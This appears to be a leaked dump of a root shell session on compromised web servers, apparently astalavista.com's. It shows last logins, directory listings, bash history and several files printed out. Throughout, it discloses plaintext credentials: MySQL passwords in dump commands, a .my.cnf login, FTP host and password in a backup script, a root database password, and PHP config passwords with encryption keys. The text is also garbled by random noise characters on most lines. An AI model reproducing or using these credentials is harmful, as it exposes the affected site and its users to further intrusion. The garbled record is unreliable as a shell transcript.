) @" B$ P _& v/ I, O# | | ___] | | | |___ | | \/ | ___] | | | #
2 z8 j6 Q2 S8 z$ z* q# #
8 S$ l+ w) k0 Y4 P. A" Z Z, G8 c( F4 t#####################################################3 e! L. m. x/ ^ l8 } ^$ }
# #
% D! a" ?2 P% _- j8 a, u3 f5 S# Admin Contact - 链接标记support@secureservertech.com #
6 S' [5 J8 d0 J' n+ E# #9 W" A/ I: Y! x) ^( c+ [; W
# Available ShortCuts #9 K: ]3 I9 ]: W1 m ~$ E
# #
7 R' f4 `1 g" m& ?5 s# nst - list active connections #
2 j4 d% X4 H0 n# ddos - shows how many times each ip is connected #* O+ h: j1 f" Z: o4 d* L% s
# ltr - restart the webserver #8 Z4 w6 Z, j- r3 w
# phpc - edit the php config file #+ z: T. j1 ~' L' W& s6 m
# htc - edit the webserver configuration file #4 [# k' d* F" U5 p9 x, H* E( m
# up - uptime #
+ I! Y4 j* V. ?# etd - edit the motd of the day file #
7 C* B) n) O$ P# htr - start and restart apache if needed #& m9 L3 _3 q& u' k) `# ^* }
# syng - shows active SYN_RECV connections # {0 B4 u) Y/ y ]' G
# synd - syn flood blocker - “synd -h” for usage #
; h% ?( q, I0 Y! ?* T% ^/ H$ k#####################################################8 O/ y- |0 p8 i. j4 u# |9 O# c
# NOTES: #6 i3 `9 K; s. X) h) ^% E
# Last Upgrade - 12-08-2008 by JF #4 S9 d9 B. }* C# v5 i
# My.cnf/Mysql Optimization - 1-28-09 #
! J! E% l' I: q( J# #
' d" U7 t# z0 N- F+ ^# #
4 ]" u3 ?8 R K9 o& T# #5 z- x9 `2 H6 @" L' G9 J3 \
#####################################################
7 E! R& N2 Z" I' j/ W
1 F7 @/ [9 ?3 p8 ~6 g3 Fsh-3.2# lastlog | grep -v Never4 h, y- W4 q; ?* F2 \) ?& T6 L; }) G
Username Port From Latest
# I/ j. u8 D# `root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009. P" M9 M, L1 Y6 s! R: l3 q g
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008; t- Z2 |$ u* L
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009% m+ b2 a4 _! W: c+ D) y
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009 u2 {* T( C& [% ~8 g
4 ?7 F" k* W9 Q1 x5 w9 H
sh-3.2# ls -la
8 B4 K& _' k8 K; T2 Rtotal 453376" P9 P j: Y7 g7 q/ u/ M7 Y; p3 ~- @/ }
drwxr-x— 15 root root 4096 Jun 4 08:40 .5 n. V- g6 M8 [
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 r9 P: v3 B8 L4 [% b# j-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
. \4 \: e3 j1 ^% f-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ v2 m: N2 P3 x7 L' ` O7 W
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
7 A; z+ H) j0 H( c# h) j-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
. z& O! v. V r6 @* C2 Y. g+ _-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
9 n+ R2 K- W& v8 j0 _6 ~5 H4 p-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
+ [+ W' N) b; Q! s% k( p0 z% b& a$ N-rwx—— 1 root root 1899 Oct 28 2007 bk.sh4 d; m7 i+ @. z+ H
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
/ ?) E0 W! d/ v-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql6 x( R: d h$ h2 S8 L1 r2 S9 Y3 k
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan; ~, v" Z" }& T, O. }9 `
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc; d B, f- \) R6 w* b) c3 u" ]' F
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql9 L; t, Y# Q7 A
drwx—— 2 root root 4096 Oct 28 2007 .elinks8 u$ K2 G. I) i! i6 ?; H1 G# k# E3 O
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1; r& | p! c4 ]
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
$ m; }4 h2 g/ C/ v, ?-rw——- 1 root root 0 Apr 16 13:19 .history/ V( i! h' c3 |$ c" A
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log, r0 {( B" y) x
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog& k$ q+ R! ^" n, |) v$ o
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh, s3 m7 {+ f% Q% f7 B* [& P
-rw——- 1 root root 35 Jun 2 14:23 .lesshst- S* i9 c D0 F3 I
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
7 X' n8 F# y1 cdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 D6 D: J' ^% [; O% l# w
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz/ {+ S8 `6 m* W4 p+ \
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
: @7 D# W" m. K. F2 g-rwx—— 1 root root 760 Sep 18 2008 lp
. S; R( ?7 \. M' |8 N' ?drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
5 e: b9 o/ u8 M7 G- g' ~-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
# U2 ?8 t. n$ V' Z& F-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.10 [6 z9 c D# |4 r6 I! L+ ?+ |
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
8 \9 `% {) [" \) G2 h-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz- c+ g/ }$ b7 `+ G
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3. o/ I- Y7 I1 u4 f
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz. ]% p0 ^$ b3 g& s
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
8 R+ w& [' J% e- m1 b-rw——- 1 root root 41 Oct 19 2007 .my.cnf1 I& w8 }& G4 S; @
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
5 a% ~( M6 g# L+ f7 L$ \& q6 d-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
% \! a% j4 e% d* U* e& ~-rw——- 1 root root 41 May 20 2008 .mytop. ]8 I. k2 j9 v! T6 b
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
- T1 Y, e$ W0 k-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz9 i% b4 X2 w, B' V7 M
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp* S: C/ u# p# ?, `. f3 U' X
-rw——- 1 root root 1462 Sep 21 2007 opt.php
, V5 O/ W6 b8 ?9 B! L2 R0 K-rw-r–r– 1 root root 3371 Sep 22 2007 p
- T+ o/ R* t( Q0 V# {-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
: S/ L7 t/ w p4 O5 ?- J' M-rw——- 1 root root 1024 Feb 3 21:32 .rnd
+ W1 u" X/ U- z: h" g7 a, ~-rw-r–r– 1 root root 716 Nov 28 2007 server.csr! z3 V5 z# i1 g' { D5 u) }& n/ U
-rw-r–r– 1 root root 887 Nov 28 2007 server.key9 x- O2 G U3 \5 T4 F
drwx—— 2 root root 4096 Oct 10 2008 .ssh/ X; R {, R" J0 Z
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat% Z+ q: t2 }( F* l! [
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc2 D# {5 x9 t! h8 `! T4 \4 D7 ^
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip! {3 t5 v9 I* B3 d# I* `
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
. }3 @! @2 t7 ]& G$ J+ i6 Vdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
w6 h# m) K& X! i- d- e-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
% u1 w2 ~1 A2 J+ d+ r8 ?" bdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0- \3 ]- K Q# Z/ s
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2/ e9 [% Y% U2 h. P- l+ f y7 [" q8 V t
-rw——- 1 root root 12997 May 16 2008 .viminfo' }2 P: ]7 F& w( x
# @+ o" M! W7 v- o
sh-3.2# cat .bash_history* K- K0 o2 s# V& S/ U9 a/ K
[snip]; \; F c5 K5 p
wget cp4sst.com/sstlinux.tar.gz& ?5 p0 W/ P2 Z9 r
tar zxvf sstlinux.tar.gz; h% B+ ?) g& E1 E; ~: C& `. @
cd linux-2.6.27.10
$ v m# Y6 c/ B* k" D) Bsh install.sh
+ o7 ~5 w" [5 p" C3 \make bzImage ; make modules ; make modules_install ; make install
" Z- h* [, ?* {5 vmake clean. Q- I4 U4 f) s' C" K2 j
service mysqld restart# t3 `3 m: W' a) [6 a
[snip]
) i! ^+ t9 f3 @4 t- k* u) B+ R7 Tcd /usr/sbin/) I, p! P. }- ?* T. f
chmod 4777 traceroute- b! O' F, F k
chmod 4777 ping/ p% T; j7 {' \- H" S8 R
traceroute -I 链接标记[url]www.astalavista.ch[/url]/ |9 [2 F T8 }+ c* J/ M
[snip]" X# x/ ]- m' d. f1 E9 G
vi /etc/csf/csf.conf
- }: H- X, v2 [! e; K6 D9 t8 itraceroute google.ch
" d8 S1 t% g; S/ y, H* o7 i0 _service csf restart
0 w7 E; _" }. O8 `& ?+ ^tracert google.ch
5 ^4 C1 m- o% I" J2 z# h( x" @5 y1 {( wservice csf restart
* K! B% |: [6 r! o% vtraceroute 链接标记[url]www.google.ch[/url]1 m6 L; x7 }4 A9 I
tracert 链接标记[url]www.google.ch[/url]& G: y; v8 `1 J; Y
traceroute 链接标记[url]www.google.ch[/url]
4 D5 ? J5 b$ p \/ L" k( D( |locate traceroute
8 v7 F; Q9 k$ o- kchown 4755 /bin/traceroute
+ b3 n }8 D5 }, Kchown 4777 /bin/traceroute% j! j+ B; k" M. @- P+ V
locate ping) u$ Q- J- `* o( O
chown 4755 /bin/ping$ _- `& d$ ^2 i3 J' Q B
chown 4777 /bin/ping
- ]$ {8 Y! u, n+ f! l! Ycd /bin/1 P0 I/ U- Q9 `! l' ?! t7 F
ls -ali | grep ping
& W" W; o% J( i! R- Xchown root ping
5 C/ x( X4 n; X' l0 H( y, x" Cchmod 4755 ping4 U( h! m' j( F* {: z
ls -ali | grep traceroute$ h. d6 ` X$ b6 y# ?
chown root traceroute
8 J; W- G# z9 z7 `/ O* T$ Ichmod 4755 traceroute" ~/ L/ r& r+ d4 j
ls -ali | grep traceroute
$ D: f j, ]2 g' v$ [% h- utraceroute -I 链接标记[url]www.google.ch[/url]
; S7 C- @8 N n/ T, j: etraceroute 链接标记[url]www.google.ch[/url], ~2 v( }* f5 A1 }2 U
whois pmsantos.ch8 y$ o. o W X# K# @
[snip]
8 o6 c: `, q/ M- ^3 v3 \mysql -h com_contrexx2_live < /root/defaultp_ports.sql/ K% X4 L; g6 y0 b# j
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
0 H* u/ Z$ |, ~8 R8 ^mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql; r/ m% G6 I$ Q+ V! Z
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
2 @; u+ _- m1 qtop, N8 t1 ~; L! Y1 k
ping ssth.ch8 r# U9 R+ w" S
ping asdlkfaljgasd???ljg???lasj.ch* p4 b+ w9 V) l3 S( W: F* G/ [/ p
ping asdlkfaljgasdlasj.ch; n; _- {1 }1 z1 e, K
ping 链接标记[url]www.ssth.ch[/url]% i' M4 `+ A) i$ K9 A
ping ssth.ch
' B" f, X9 Y1 cnslookup 链接标记[url]www.google.ch[/url]
, Y1 R( ?0 l1 `+ e8 F+ Y+ Tnslookup 链接标记[url]www.ssth.ch[/url]
' ?. G4 L% I Q! g2 R% C4 Oman nslookup5 V1 v: y. X/ T6 X% E! |7 }
ping 链接标记[url]www.google.ch[/url]
8 M4 G$ `6 Z V& @8 W% U0 Dnslookup 链接标记[url]www.google.ch[/url]
5 l5 R( T" c' A9 ?4 B8 cnslookup 链接标记[url]www.google.ch[/url]
~% E; K D1 L- jnslookup salfjasdlf.ch: R1 \# p% H! ~, n
[snip]2 I( a9 K0 r1 @1 m: G/ w5 }
openssl passwd -1 sadf
2 I, w+ D9 `8 Oopenssl passwd -1 5cZNHstdTy$ t; c) x4 |" p6 Y1 {0 \$ O: s
mysql" C/ ]3 O x& C, f
mysql& z+ {9 o5 d$ x' v, f. K! Y0 N
locate proftp
& l' _7 g( ?! v7 p* [vi /etc/proftpd.passwd
% {2 Y* C* n8 B% C+ Pservice proftpd restart
; L7 e8 O% }7 p# a: k/ Zlocate proftpd.conf
0 u! @ D+ y, k+ [; T" p6 `8 hvi /etc/proftpd.conf- |7 a( K: k* p( o! h: G# T
vi /etc/proftpd.passwd
$ z( T3 e; q2 @" j% q, j$ D& aservice proftpd restart! @3 _# w3 t# `0 Z
[snip]( W5 A$ t# X4 N& o, B6 d; j
/bin/sh /home/com/backup_system/backup.sh
* U( S( N1 P6 o# }* A# star cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin7 s# D2 z! \( }. E5 ~
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql% [, r; A, Z! s
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql8 R' ?! J* _+ s( s
ls -ali& @( Z; ~: L5 ~1 I+ n1 R
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql' X9 F) R- [- U9 M4 H: `
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql% B x E2 z$ K0 E9 h
crontab -l1 n/ X. q" l8 l1 b7 n
crontab -l
+ H# {9 I N( S! A: @7 z( iphp -q /home/com/public_html/modifications/cronjobs/securitynews.php+ J9 s5 P. {7 k6 c. @
/home/com/public_html/modifications/cronjobs/exploits.sh
( X) _! \3 p1 \' u2 Zwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
/ L( M: Q( o A' k' ztar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz- c% q3 Y- L& u' Z/ j' D
cd lsws-4.0.3; s3 _. @/ t% e5 \$ m7 [" ~& a1 R
sh install.sh& t6 d& n0 o% y4 B' j5 ^3 B
uptime5 s, e/ ^9 H7 q4 X! ^& v4 ]
hdparm -tt /dev/sda
! v! l, ^% f$ n( ]6 X! {iostat
% [: u5 I( P+ o7 X: _4 J5 {) L4 L Tyum install iostat* M P0 F3 k7 Q3 k) M7 L J; i+ Y' e
iostat+ H% T$ U' _- t3 j) D) w* v& c* }4 `- D
whereis iostat
5 Z! k; P3 O9 U R) tyjm clean all2 {1 m$ v2 V4 w1 U7 s4 D4 q
yum clean all ; yum -y update
. ], B& _0 a- \( C/ x% jiostat
. J6 M1 v, ` N/ p+ q# S5 Y$ dyum install systat( Z! L# w. G" p: z u
rpm -qa | grep iostat6 t7 x& X4 _1 B4 P. X4 ^
rpm -qa | grep sysstat1 a5 i* S7 U9 B: U9 {; g
rpm -qa | grep systat
' ?4 _, ?, y' L y% s1 D; Wdmesg -c
% g% Z, {8 K8 jsysctl -p# y) _! h' s& V6 E. P1 {* r9 P
uname -r
3 `3 X3 N u ~/ i! i Tcd /usr/src9 l2 ~" q# G7 m" l0 K
wget nix101.com/kernels/sstlinux.tar.gz
. ?/ Q/ H* a5 w) ]3 V# }shutdown -r now1 I7 W7 h' q g6 c* Q
nano -w /boot/grub/grub.conf- S9 K; L; i7 A+ M7 H( P( _# ?
' ?. j1 t1 k- t7 c+ Qsh-3.2# cat .my.cnf
. B' o0 {: p4 G, C0 B% Y[client]* M- r' x5 P% T* k
user=da_admin
+ K! v. w* ]( Ppassword=X9dctmRH( t, B. ~8 ]9 G3 X: S: u
2 j; R8 z0 D# z. I/ U
sh-3.2# cat /home/com/backup_system/backup.sh
1 }' `) P2 g* Z#!/bin/sh
. b8 F A9 b C' y( L#####################################################################
) x4 f- W% _. c8 g1 B1 m# #2 B" \ B1 f7 R' w( w; H( [
# incremental backup for astalavista.com #5 [+ `7 B4 s1 h* V# e; I
# #7 b# o: }- @+ F* V& K
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
! n D4 M$ z5 }0 N3 \/ F6 d. Q# # j `; L% @" F; ]. K( v
#####################################################################
- Y7 G9 f3 I% }: L! Q' s( t[snip]
9 i9 M0 k" z3 k( v& h; K( l: [* ]PROG_DIR=”/home/com/backup_system”;4 a3 |: [* T1 }5 h
BACKUP_DIR=”/home/com/backups”;4 I7 I8 C2 h$ X6 L
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
! G) [% B; @2 T5 Y+ g: k# ftp for synology backup server
2 o8 o* C) F" }) a* z; LFTP_HOST=”212.254.194.163″;
2 T9 ^4 }3 g% K% J- M- O1 Q- X7 xFTP_PORT=”21″;
# R1 d+ `; N: Q" ]$ {3 lFTP_USER=”astalavista.com”;0 V/ O* e9 \! X6 W
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;7 W$ U9 ]( n/ s' L7 Z, ~ Z2 g* w
FTP_DIR=”/astalavista.com”;
$ V; n r! X( ~2 W L# database- l& F2 ]2 i. P4 V' {) K2 K R/ H
DB_HOST=”localhost”;
3 L7 H0 U- d @' U: [7 mDB_USER=”contrexxuser2″;5 z- ~( Q& i( J. z- T
DB_PASS=”0fEYNZgXz1pKe”;6 J7 h6 L; Q3 q0 g
DB_DATABASE1=”com_contrexx2_live”;
6 X9 x& ^9 [4 rDB_DATABASE2=”com_contrexx2″;' `) c- `3 s. x/ L6 ~
[snip]$ w" i6 K4 w3 X! P- N
ftp -in $FTP_HOST $FTP_PORT <<EOF
! W! ~" r- T, F/ jquote USER $FTP_USER, j3 C2 b$ Y5 N
quote PASS $FTP_PASS* x4 \1 i8 U1 W% W
cd $FTP_DIR
0 _2 p! N j) yput $DB_FULLNAME-SQL_Dump.tar: d& P9 K/ ]8 |9 H3 D
put $BACKUP_FULLNAME-Public_HTML.tar2 C; ?2 ~ r* O( @" Z
close
7 X% Y% A4 x' `$ M) b1 @bye1 \/ g: b4 j7 u9 g- X- K: }; {/ e6 c
EOF( z/ H" T/ w& |
. Y) n( p3 S5 x2 Z
sh-3.2# cd /home
( O# c6 `, b, R, ?9 \; wsh-3.2# ls -la6 D+ ~# \( ?6 b ~5 t: ]. x# b
total 120
% O, w# N+ C" `' o* c- H& ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 . X" l. s6 W5 j( Q; J& x6 n3 n
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 ^' @7 F# }( c0 s8 p, e9 ddrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
/ P, d7 L7 R2 e' F7 p0 F-rw——- 1 root root 8192 Jun 4 03:03 aquota.group. g- `1 H% [) Q- @6 L. g( W) l
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
. Z9 e& K* i- X% V+ Y8 |drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
$ i+ Z- a- T W. b& qdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup/ f% |8 X3 i7 o" W+ n; t7 c& x2 ]9 c
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161; H0 r P6 W- B0 s5 a% j
drwx–x–x 10 com com 4096 Apr 28 12:40 com
3 T- O& s) L2 [0 W# mdrwxr-xr-x 2 root root 4096 May 17 2007 ftp* P4 W: ~' S; S
drwx—— 3 jon jon 4096 Sep 21 2007 jon/ ?; m& i0 m# \5 b7 B& y* R# g& N
drwx—— 2 root root 16384 Sep 11 2007 lost+found
1 L) E7 `( @$ I1 r" ~% \/ idrwxr-xr-x 2 root root 4096 Sep 14 2007 my
6 W8 I. n3 K6 {6 X" ?, A. Mdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
# k- ^5 e6 Z0 w; U( |drwx—— 2 jon jon 4096 Sep 15 2007 test
/ M; ~2 x' I; U. [+ W7 R+ S7 Xdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
! n8 T# s& m" e: e9 ~3 Q/ @, Y0 d( _8 P3 ^7 P& v
sh-3.2# cd admin
4 ], \. O+ @* [# U T! G) Dsh-3.2# ls -la; p7 h% _, ~; n' a( X( E& `
total 17358967 Z: A$ Z, o; _" T- a! C5 V
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
7 E" T! t F; f& {; t# fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ C' @% z! T1 {% w+ o" l% l2 E$ g
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
2 ^$ K& @- U( _. F; [( [drwx—— 2 admin admin 4096 Sep 28 2007 backups
. A' H% z4 U: }3 T0 ]5 ]$ }-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
' F T/ M n2 S-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
( `$ }8 E; K, {5 K3 ]-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
! P$ b/ G: f. f; O-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
6 ^( l; S+ r% e8 ]; O" @( r. Ldrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
4 b) V6 K! o2 K8 O ^+ H: }drwx–x–x 6 admin admin 4096 Sep 21 2007 domains+ p% x2 S) {% K
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
; ~2 O. w: ^* Y, {6 K" ?-rw-r–r– 1 root root 24 Sep 21 2007 info.php+ F$ y6 O4 g) c9 b+ }2 A
drwx—— 2 admin admin 4096 Sep 21 2007 mail$ |0 @# W9 |' E) q
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
$ ^) d+ J1 p6 i8 ~' n }4 m-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 L k8 \* L3 u; g# }
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow) q) { h) H5 _/ Z
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz4 R" B5 F% g- D( r3 d2 o, c# e
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
3 z( M8 a0 X7 a, Z3 C: ^
2 h4 X/ \! W+ \# o2 f" }sh-3.2# ..
) T" I2 Y, }6 H) ?! c) o. Bsh-3.2# cd jon
, {" f& E3 r, D! w# N2 f! Psh-3.2# ls -la" q. ^ L; a6 Q; @, S7 G, ^
total 367 @/ p8 ^9 E- l3 l a
drwx—— 3 jon jon 4096 Sep 21 2007 .1 c& P9 m m4 g4 U. L
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: O2 T6 E7 c* \$ h9 X0 k
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history: i; ^8 s5 H4 v
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout4 m3 G3 a9 F X; u, P) J9 o. Q; W
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile5 R& v0 A6 E+ x" w) ?
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
+ D* _9 y& q- `: x' ~. @9 v-rw-r–r– 1 root root 24 Sep 21 2007 info.php
J* ]: R3 \ Z1 x5 m" bdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
5 M# y; w N5 X C) d) R7 Y \$ h2 f- z0 b4 x$ `
sh-3.2# cd ..
$ X( f% ?2 f# f, |, {sh-3.2# cd test6 v- G6 y3 W+ D* Z }
sh-3.2# ls -la
`' }' @" a7 f0 xtotal 48
" n" y. L# e$ z# gdrwx—— 2 jon jon 4096 Sep 15 2007 .
$ l: Y; ?3 R, B& \* q @ Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) f1 x8 D% N, e4 H7 i0 X
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
6 J" a$ p A* _-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout* U5 }+ P8 k1 s* M8 J+ d7 @% ^1 F# e* \
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
/ k& _( W Q) y; {% M/ [) v) h-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc9 c/ L3 i7 l/ I) N& O# D0 T7 V
sh-3.2# cat .bash_history3 V" b/ M. p# ^; {0 J# {
/usr/bin/mysqladmin -u root password PoliuJhytg678 \1 o" D3 T5 [
5 r* H) U& v+ o1 }! nsh-3.2# cd ..
; o+ c0 b! H! e9 a; ash-3.2# cd astanet6 _5 G% P4 _8 \0 y' b- N
sh-3.2# ls -la
8 R7 f) t) M2 Wtotal 52
, M7 t0 c; B: u7 ]) d" Ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
( C& c2 {% W4 B$ N5 bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: O. Q! f% ^2 R$ C' [
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth; _# ]" f- A; l4 F5 ?$ P/ E# g
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- j0 @ f6 O1 S( N. n# a, e u
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout, g# g: O6 D4 C( J( Q( N, U' q
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile5 A0 Y: ^! v& h
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
* h, Z1 |! a6 f' Z- d" {6 l- ?, I* Tdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
' h E8 ^5 q5 O( s; ]drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap7 U- q7 E: R4 i) @4 T# Y" b
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
0 E7 C' R3 i! J9 G: A* ^# W: B1 |-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history0 y% J/ ]0 \1 i& L
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html- y5 [7 b1 d3 f
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow- b- T! H! \9 Y
4 @! C+ h' K H! E" S6 v. T% F) c7 xsh-3.2# cd auth/
3 c' C, ?( E" C; b$ F# k# }sh-3.2# ls -la
" h7 D0 {0 ^1 I' Utotal 28
' q& m* O7 _( F2 M) Edrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
' N* j1 I/ e0 c' gdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
( }+ l- ~# O6 E# ]' l8 S( \-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php; `% @$ l' L" \. i8 s3 K
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
! x. y7 z: ^9 g/ U-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd9 J: ]% ^! |) o J3 ?% ]7 M
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting6 C+ M" i! h0 q' w5 T) M! A
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
0 `9 H8 B% [1 }1 I
]- ^) o3 Y' m" ~$ X o, }sh-3.2# cat hackercontest.config.inc.php$ l3 G) s/ u! |+ c5 ]% n: `7 a* j
<?PHP
7 ~: t) u; q2 z; g// Variabeln f?r Verbindung zur Datenbank //
; h% J1 M5 ?" z3 k& O" p B$ N' G+ y$conxHost = ‘localhost’; // MySQL hostname
6 l' O B& L( p# g& X! p' l$ g$conxUser = ‘hackercontest’; // MySQL user: f4 E; l. e/ z2 V5 t8 t
$conxPassword = ‘K6m@7dUc’; // MySQL password
, T$ s' U6 e+ S" I$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish! S* @# n" t9 B
?>
- U) T: p5 w& P; x) j7 r9 o& tsh-3.2# cat hosting.config.inc.php
: K% v8 Y# r8 e/ F4 F<?PHP
5 d9 k5 j+ \7 i1 W- k3 P// Variabeln f?r Verbindung zur Datenbank //( A/ ~' B; Y$ K$ M1 W5 n
$conxHost = ‘localhost’; // MySQL hostname
/ p$ I; b2 m8 T, i$conxUser = ‘hostinguser’; // MySQL user
9 M+ {2 H% X. k- F4 P$conxPassword = ‘cXvB3981′; // MySQL password
. s$ F" o. L4 h& a$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: _* h9 t/ k! v& K7 ~! j4 t) Y
?>9 C' \+ w6 y, [$ z% c9 N' E
6 K2 w& _: U7 Z5 w( A
sh-3.2# cd ..5 ~9 Z( y, t+ n
sh-3.2# cd com
9 b1 F+ ^1 D" x2 g8 z* C# @1 h% qsh-3.2# ls -la0 V0 [+ M$ J( p3 ?6 h
total 141208
; ~2 q \$ l; v9 fdrwx–x–x 10 com com 4096 Apr 28 12:40 .
7 g) l: E* |7 E, i; r& S' r2 `drwxr-xr-x 14 root root 4096 Mar 11 17:56 .., ~7 z" f) b9 L4 [
drwx—— 2 com com 4096 Jun 4 04:04 backups
